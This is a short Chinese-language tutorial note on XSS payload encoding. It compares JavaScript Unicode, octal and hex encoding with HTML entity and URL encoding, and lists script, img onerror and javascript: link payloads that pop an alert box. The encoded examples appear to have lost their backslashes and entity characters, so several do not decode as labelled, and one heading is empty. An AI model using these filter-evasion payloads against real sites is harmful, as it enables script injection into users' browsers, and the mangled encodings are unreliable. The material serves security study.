一、JS编码与HTML编码区分:
HTML实体可以使用十进制与十六进制编码;javascript可以使用Unicode与八进制与十六进制进行编码。
二、编码原理区分:
三、编码与非编码
对于JS编码:
1.<script>eval("u0061u006cu0065u0072u0074u0028u002fu0078u0073u0073u002fu0029");</script>(JS Unicode编码)
2. <script>eval("14115414516216450571701631635751");</script>(JS八进制编码)
3.<script>eval("x61x6cx65x72x74x28x27x58x53x53x27x29");</script>(JS十六进制编码)
对于HTML编码:
1. <img src=1 onerror="alert(1)"> (HTML实体十进制编码)
2. <img src=1 onerror="alert(/xss/)"> (HTML实体十六进制编码)
对于URL编码:
1.%3Cscript%3Ealert(%2Fxss%2F)%3Cscript%3E
2. %3Cimg%20src%3D1%20onerror%3Dalert(%2Fxss%2F)%3E
3. %3Ca%20href%3D'javascript%3Aalert(%2Fxss%2F)'%3Eclick%20me%3C%2Fa%3E
对于非编码:
1.<script>alert(/xss/)</script>
2. <img src=1 onerror=alert(/xss/)>
3. <a href='javascript:alert(/xss/)'>click me</a>